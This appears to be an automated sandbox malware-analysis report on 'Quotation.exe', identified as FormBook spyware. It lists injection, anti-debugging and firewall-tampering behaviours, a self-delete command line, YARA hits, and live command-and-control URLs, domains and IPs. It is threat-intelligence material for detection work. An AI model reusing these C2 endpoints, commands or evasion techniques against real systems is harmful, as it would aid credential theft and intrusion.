          Source: C:\Windows\explorer.exeNetwork Connect: 156.235.228.19 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73CA1000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: unknown target: C:\Users\user\Desktop\Quotation.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Quotation.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Quotation.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Quotation.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe 'C:\Users\user\Desktop\Quotation.exe'
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation.exe'
          Source: explorer.exe, 00000002.00000002.498380919.0000000001640000.00000002.00000001.sdmp, netsh.exe, 00000008.00000002.501810695.00000000048F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.498380919.0000000001640000.00000002.00000001.sdmp, netsh.exe, 00000008.00000002.501810695.00000000048F0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.498380919.0000000001640000.00000002.00000001.sdmp, netsh.exe, 00000008.00000002.501810695.00000000048F0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000000.241989429.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000002.498380919.0000000001640000.00000002.00000001.sdmp, netsh.exe, 00000008.00000002.501810695.00000000048F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000002.498380919.0000000001640000.00000002.00000001.sdmp, netsh.exe, 00000008.00000002.501810695.00000000048F0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Uses netsh to modify the Windows network and firewall settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery241Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 383984 Sample: Quotation.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 6 other signatures 2->42 10 Quotation.exe 18 2->10         started        process3 file4 28 C:\Users\user\AppData\Local\...\laegtoh4.dll, PE32 10->28 dropped 54 Detected unpacking (changes PE section rights) 10->54 56 Maps a DLL or memory area into another process 10->56 58 Tries to detect virtualization through RDTSC time measurements 10->58 60 Contains functionality to prevent local Windows debugging 10->60 14 Quotation.exe 10->14         started        signatures5 process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 14->17 injected process8 dnsIp9 30 riceandginger.com 162.241.24.122, 49717, 80 UNIFIEDLAYER-AS-1US United States 17->30 32 www.xyfs360.com 156.235.228.19, 49716, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles 17->32 34 5 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 46 Uses netsh to modify the Windows network and firewall settings 17->46 21 netsh.exe 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Quotation.exe23%ReversingLabsWin32.Spyware.Noon

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsu4E63.tmp\laegtoh4.dll13%ReversingLabsWin32.Trojan.Pwsx

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          8.2.netsh.exe.2f15d18.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.1.Quotation.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.Quotation.exe.73ca0000.6.unpack100%AviraHEUR/AGEN.1131513Download File
          8.2.netsh.exe.398f834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.Quotation.exe.1eb40000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.Quotation.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.clickqrcoaster.com/fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDo0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.riceandginger.com/fcn/?ndsxlrp=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&wZALH=PToxs4gHMXctdDo0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.xyfs360.com/fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=SEmbethRuJUohlQz+Ttvx+iBOmYZkGVPsXZysf/6weMAgxRZQrWYJhCujRXBjoMPQ+uG0%Avira URL Cloudsafe
          http://www.namebrightstatic.com/images/logo_off.gif)0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.riceandginger.com/fcn/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.houseof2.com/fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=liB0icShPNod4xlpu/WXKffa+vmxvgDQmU6O7prVAXsGW3hWFkE60zcwKq/t6p2og2/V0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          riceandginger.com
          162.241.24.122
          truetrue
            unknown
            www.xyfs360.com
            156.235.228.19
            truetrue
              unknown
              parkingpage.namecheap.com
              198.54.117.216
              truefalse
                high
                houseof2.com
                34.102.136.180
                truefalse
                  unknown
                  www.houseof2.com
                  unknown
                  unknowntrue
                    unknown
                    www.riceandginger.com
                    unknown
                    unknowntrue
                      unknown
                      www.clickqrcoaster.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.clickqrcoaster.com/fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDotrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.riceandginger.com/fcn/?ndsxlrp=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&wZALH=PToxs4gHMXctdDotrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.xyfs360.com/fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=SEmbethRuJUohlQz+Ttvx+iBOmYZkGVPsXZysf/6weMAgxRZQrWYJhCujRXBjoMPQ+uGtrue
                        • Avira URL Cloud: safe
                        unknown
                        www.riceandginger.com/fcn/true
                        • Avira URL Cloud: safe
                        low
                        http://www.houseof2.com/fcn/?wZALH=PToxs4gHMXctdDo&ndsxlrp=liB0icShPNod4xlpu/WXKffa+vmxvgDQmU6O7prVAXsGW3hWFkE60zcwKq/t6p2og2/Vfalse
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                          high
                          http://www.fontbureau.comexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                              high
                              http://www.NameBright.comnetsh.exe, 00000008.00000002.501631169.0000000003E7F000.00000004.00000001.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.tiro.comexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.goodfont.co.krexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.namebrightstatic.com/images/logo_off.gif)netsh.exe, 00000008.00000002.501631169.0000000003E7F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.carterandcone.comlexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.typography.netDexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://fontfabrik.comexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.fonts.comexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.sandoll.co.krexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.sakkal.comexplorer.exe, 00000002.00000000.260010429.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              162.241.24.122
                                              riceandginger.comUnited States
                                              46606UNIFIEDLAYER-AS-1UStrue
                                              34.102.136.180
                                              houseof2.comUnited States
                                              15169GOOGLEUSfalse
                                              156.235.228.19
                                              www.xyfs360.comSeychelles
                                              134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                              198.54.117.216
                                              parkingpage.namecheap.comUnited States
                                              22612NAMECHEAP-NETUSfalse

                                              General Information

                                              Joe Sandbox Version:31.0.0 Emerald
                                              Analysis ID:383984
                                              Start date:08.04.2021
                                              Start time:13:34:52
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 16s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:Quotation.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:27
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@7/3@4/4
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 20.9% (good quality ratio 18.6%)
                                              • Quality average: 72.9%
                                              • Quality standard deviation: 32.3%
                                              HCA Information:
                                              • Successful, ratio: 91%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 104.42.151.234, 104.43.139.144, 23.54.113.53, 168.61.161.212, 95.100.54.203, 20.82.210.154, 23.10.249.43, 23.10.249.26, 20.54.26.129, 20.50.102.62
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net
                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383984/sample/Quotation.exe

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              162.241.24.122PO.exeGet hashmaliciousBrowse
                                              • www.riceandginger.com/fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr
                                              TRANSFER CONFIRMATION_PDF.exeGet hashmaliciousBrowse
                                              • www.riceandginger.com/fcn/?nR-lCh=-ZkPgF4h0LuP&Bj4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwqJ/jNzuESGN
                                              198.54.117.216DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                              • www.boogerstv.com/p2io/?pJE8=G0GpifmhvxtXlZL&-ZoXL=fW2NkW2m2880y7g2f/m+egXTc5dWq8qtohIQX9xRv3Snfsyr1ZmLXRti4FdN58+iKIl8Sw==
                                              ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                              • www.911salesrescue.com/sqra/?Rl=pq8KHaLgBYlMb7GR3VJ/cL4dF9VTs2jS1VGjWDfBvu/RR65b3/eoUhDFCE5vmyzJV1nh&_jqT2L=gBg8BF3ptlc
                                              1517679127365.exeGet hashmaliciousBrowse
                                              • www.swavhca.com/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=t85XbN3qNlbTw/JaLNJ7F4/+On2opPlRNjQpYLfn5nRJIrt0zCXnGg8yVYHQwlCaZVdo
                                              TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                              • www.switcheo.finance/uwec/?-ZVd=1bgta&T8VxaVs=3cOH6CffnF8zA2vO0DHvKlrvSwO+w2vUbH/s+qgAJjYXXQ/ohIL0shsdTQ14Zv3dTuQV
                                              igPVY6UByI.exeGet hashmaliciousBrowse
                                              • www.dbdcontractlngllc.com/evpn/?6lB4ir3X=HFShCSWXwaKkW2ZiFlcUlPO3+HJMVrrKG3pif6jrFe/K9RUAGcpqC/YV0bjZ8afR2I7A&lZQ=fxoxjP38
                                              order samples 056-062 _pdf.exeGet hashmaliciousBrowse
                                              • www.gattisicecream.com/nu8e/?7ntLT=H0OBJMmEUgvZcgBddvaavx+e86Q1Ewqz/q4u2TIdbw6nMChu3R+Cq7j/in+DO7Gj50PD&v4Xpf=oBZl2rip
                                              P.O71540.xlsxGet hashmaliciousBrowse
                                              • www.toplevelsealcoating.net/njo/?jpal0=mxuHlFV+ZuSguIs2Jcwsp6DcsuxeedOYcK/5rsXgvOQsfT3joYJg2D4C6z0Ci+7Qc2CgOg==&3ft=fxotnVnH_pxPJD2P
                                              Purchase Order _pdf.exeGet hashmaliciousBrowse
                                              • www.doorman.pro/bft/?s8eTn6p=cPB7zr1p3SmwgzYXiBUkF9mwqufO0UDDdPUnBBhQn+hhkWASV2AK1gVN757rEFaij0Eh&2d=lnxh
                                              PO#4503527426.xlsxGet hashmaliciousBrowse
                                              • www.oodi.club/j5an/?3f=dOaW3vahSXqg4+CHM7A8brpc4JT3ik1DQ14U6alOEgrJbBQuvLIVfIvFsL19wjAmshOCtA==&SH=u2M0w8Cp
                                              SOA 2.docGet hashmaliciousBrowse
                                              • www.inifinityapps.net/bf3/?pBR=swuzFfg2YELF3Ru0riS9eAlbkrlhpvPYJEoO3kAfMfwngIUjKqHF470zbQhO/y10VYkWvA==&ON6h=lFQLUjPpddS8R0S0
                                              imTmqTngvS.exeGet hashmaliciousBrowse
                                              • www.techinvestor.net/tmz/?qFQhSfAp=K3BD3qDI+aee8DpmSbQXpbOTPwLovYyqciBQO+B1r1efJTEAnqucMp36KUkTt76iGrJvJTWHKg==&8p=fdiLulhXj
                                              winlog(1).exeGet hashmaliciousBrowse
                                              • www.304shaughnessygreen.info/oean/?u4XpH=d8/ljYFfl/PIYPjWsWUnApMkbVV7hvzPIdCz8jHXy+5qO30gF7f5xBZ16m2K4v/YBLhmp8B+9w==&8pNhXv=yVML0zB0
                                              Request for Quotation.exeGet hashmaliciousBrowse
                                              • www.kingdomwinecommunity.com/9t6k/?wR=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN34534+xty7Jcn&S0Gll=RRHTxr6PgzuH1
                                              in.exeGet hashmaliciousBrowse
